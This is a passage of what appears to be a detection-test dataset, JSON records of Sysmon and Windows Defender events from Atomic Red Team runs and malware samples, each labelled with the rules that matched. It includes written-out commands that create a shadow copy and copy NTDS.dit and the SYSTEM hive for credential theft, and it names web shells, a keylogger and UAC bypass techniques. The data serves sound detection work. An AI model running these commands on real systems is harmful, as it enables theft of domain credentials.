Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"vssadmin.exe create shadow /for=C:","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Command Line Interface for Microsoft® Volume Shadow Copy Service ","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AC561205CD59BBCDB158525978FF65BDF17FDC3C,MD5=614B5C4238977130AA2270C8AD58CE6C,SHA256=D7577FB88CCA3169C7931DC0D8EC9A444227DC14F6C71D6D39D86A0C5CAD1976,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE","Image":"C:\\Windows\\System32\\vssadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"vssadmin.exe create shadow /for=C:\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DD9E-5D31-0000-00100C3F4B00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00105E414B00","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:26.981"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4129,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.989143Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\Extract\\ntds.dit\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00101A4A4B00","ProcessId":5772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:27.156"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4131,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.169217Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\Extract\\VSC_SYSTEM_HIVE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00102D4D4B00","ProcessId":976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 15:11:27.192"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4132,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.202862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{511224D4-1EB4-47B9-BC4A-37E21F923FED}","Detection Time":"2019-07-18T20:40:00.580Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1056\\Get-Keystrokes.ps1","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147725349","Threat Name":"Trojan:PowerShell/Powersploit.M","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":37,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:00.730676Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{8791B1FB-0FE7-412E-B084-524CB5A221F3}","Detection Time":"2019-07-18T20:40:13.775Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1086\\payloads\\test.xsl","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147735426","Threat Name":"Trojan:XML/Exeselrun.gen!A","Type ID":"2","Type Name":"%%823","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":48,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:16.396422Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":75,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:16.418508Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"6","Category Name":"Backdoor","Detection ID":"{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}","Detection Time":"2019-07-18T20:40:18.385Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\cmd.aspx","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147683177","Threat Name":"Backdoor:ASP/Ace.T","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":76,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:17.508276Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}","Detection Time":"2019-07-18T20:41:40.357Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147726426","Threat Name":"Trojan:Win32/Sehyioa.A!cl","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":95,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:48.236136Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"containerfile:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0068)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"},"EventID":1116,"EventRecordID":102,"Execution_attributes":{"ProcessID":6024,"ThreadID":6068},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:51:50.798994Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer","New RUN Key Pointing to Suspicious Folder","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Tendyron","UtcTime":"2020-10-15 13:17:02.706"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":416056,"Execution_attributes":{"ProcessID":3368,"ThreadID":4748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.736849Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=F359D3C074135BBCA9A4C98A6B6544690EDAE93D,MD5=02825976B19F123872914C233CF309BB,SHA256=0DD700BB6A992FFD40B0D2B41FC5875CD3B319A7079F67B3DC37428B5005B354,IMPHASH=45D79E943E6D34075123B434B5AE3DEB","Image":"C:\\Users\\Public\\tools\\apt\\tendyron.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\OnKeyToken_KEB.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-4BCE-5F88-0000-001070544D00","ProcessId":2572,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-10-15 13:17:02.659"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":416061,"Execution_attributes":{"ProcessID":3368,"ThreadID":4756},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-15T13:17:02.963417Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.734","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\__tmp_rar_sfx_access_check_2914968","UtcTime":"2020-10-23 21:57:34.734"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423992,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.745175Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:57:34.751","Image":"c:\\Users\\Public\\test.tmp","ProcessGuid":"747F3D96-51CD-5F93-0000-001073735B00","ProcessId":7624,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp1375\\d948","UtcTime":"2020-10-23 21:57:34.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":423993,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:34.767786Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:22:14.491","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\sduchxll.tmp","UtcTime":"2020-10-23 21:57:36.328"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424049,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.332819Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424060,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375368Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424061,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375422Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424062,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375487Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 